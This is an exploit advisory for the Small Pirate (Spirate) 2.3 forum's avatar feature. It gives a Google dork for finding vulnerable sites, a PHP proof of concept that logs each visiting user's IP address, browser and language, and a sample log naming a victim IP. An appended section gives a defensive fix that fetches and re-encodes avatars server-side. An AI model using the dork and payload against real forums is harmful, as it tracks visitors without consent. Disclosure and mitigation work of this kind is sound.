# Exploit Title: Small Pirate <= 2.3 (avatar) Remote PHP File Execute PoC
# Google Dork: Powered by Spirate 2.3 & SMF
# Date: 25/03/2011
# Author: Daniel Godoy
# Author Mail: DanielGodoy[at]GobiernoFederal[dot]com
# Author Web: www.delincuentedigital.com.ar
# Software Link: http://www.spirate.net
# Tested on: Linux
[Comment]
Acknowledgements: Hernan Jais, Alfonso Cuevas, Inyexion
Lucas Apa, Juan Urbano, Sunplace, KikoArg
Knet, Harakiri, Luciano Lapporta Podazza,
SIR and especially my mother.
[POC]
This vulnerability allows an external PHP file to be executed for any visitor of the forum.
The PHP file should contain the malicious code.
The scope of the attack depends on the capabilities of the PHP file.
<?php
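// Exploit Title: Small Pirate <= 2.3 (avatar) Remote PHP File Execute PoC
// Details of the visitor whose browser requested this file
$ip   = $_SERVER['REMOTE_ADDR'];
$so   = $_SERVER['HTTP_USER_AGENT'];
$lan  = $_SERVER['HTTP_ACCEPT_LANGUAGE'];
// Location of this script on the server that hosts it
$url  = $_SERVER['PHP_SELF'];
$path = $_SERVER['DOCUMENT_ROOT'];
// Log file ("archivo" = file), opened in append mode
$archivo = 'pwned.txt';
$fp = fopen($archivo, "a");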
$string = "
$path$url
VICTIM: $ip
info: $so
language: $lan
";
$write = fputs($fp, $string);
fclose($fp);
?>
[Content of pwned.txt]
/home146/sub011/sc78626-TZRV/xxxxxxxxx.org/poc.php
VICTIM: 207.182.149.243
info: Mozilla/5.0 (X11; U; Linux i686; es-AR; rv:1.9.2.13) Gecko/20101206 Ubuntu/10.04 (lucid) Firefox/3.6.13
language: es-ar,es;q=0.8,en-us;q=0.5,en;q=0
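
[Mitigation example]
A mitigation sketch for the issue above, added here and not part of the original advisory or of Spirate/SMF code: assuming the forum lets a user set an external URL as the avatar (as the title's "(avatar)" suggests), the forum fetches the image once server-side, re-encodes it and serves its own copy, so a visitor's browser never requests the third-party file. The function names, limits and storage layout are hypothetical, and the GD extension is assumed.

```php
<?php
// Added example, not Spirate/SMF code; names and limits are hypothetical. Needs GD.
const MAX_AVATAR_BYTES = 262144; // assumed size limit (256 KiB)
const MAX_AVATAR_SIDE = 512;     // assumed maximum width/height in pixels

// Only http(s) URLs resolving to a public IPv4 address (limits SSRF via the fetch).
function avatar_url_allowed(string $url): bool
{
    $scheme = strtolower((string) parse_url($url, PHP_URL_SCHEME));
    $host = (string) parse_url($url, PHP_URL_HOST);
    if ($host === '' || !in_array($scheme, ['http', 'https'], true)) {
        return false;
    }
    $ip = gethostbyname($host); // returns the host unchanged if the lookup fails
    return filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_IPV4
        | FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) !== false;
}

// Re-encode the bytes as PNG; returns null unless they decode as a small image.
function reencode_avatar(string $data): ?string
{
    $info = strlen($data) <= MAX_AVATAR_BYTES ? @getimagesizefromstring($data) : false;
    $fits = $info !== false && max($info[0], $info[1]) <= MAX_AVATAR_SIDE;
    $img = $fits ? @imagecreatefromstring($data) : false;
    if ($img === false) {
        return null;
    }
    ob_start();
    imagepng($img);
    return ob_get_clean() ?: null;
}

// Fetch the avatar once from the server and keep a local copy, so visitors'
// browsers load it from the forum and never contact the third-party host.
function import_remote_avatar(string $url, string $destDir): ?string
{
    $ctx = stream_context_create(['http' => ['timeout' => 5, 'follow_location' => 0]]);
    $raw = avatar_url_allowed($url)
        ? @file_get_contents($url, false, $ctx, 0, MAX_AVATAR_BYTES + 1) : false;
    $png = is_string($raw) ? reencode_avatar($raw) : null;
    $name = bin2hex(random_bytes(16)) . '.png';
    return ($png !== null && file_put_contents("$destDir/$name", $png) !== false) ? $name : null;
}

// Constructed samples: a GD-generated 8x8 GIF and a non-image text response.
ob_start();
imagegif(imagecreatetruecolor(8, 8));
$gif = ob_get_clean();
var_dump(reencode_avatar($gif) !== null, reencode_avatar("logged\n") !== null);
```

The host check and the fetch resolve the name separately, so a production version should connect to the address it validated rather than resolving again.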